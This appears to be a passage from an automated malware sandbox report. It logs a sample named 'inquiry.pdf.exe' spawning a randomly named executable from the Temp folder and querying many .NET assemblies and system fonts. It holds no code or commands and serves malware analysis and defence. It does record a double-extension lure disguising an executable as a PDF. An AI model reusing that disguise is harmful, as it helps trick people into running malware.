            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Users\user\Desktop\inquiry.pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
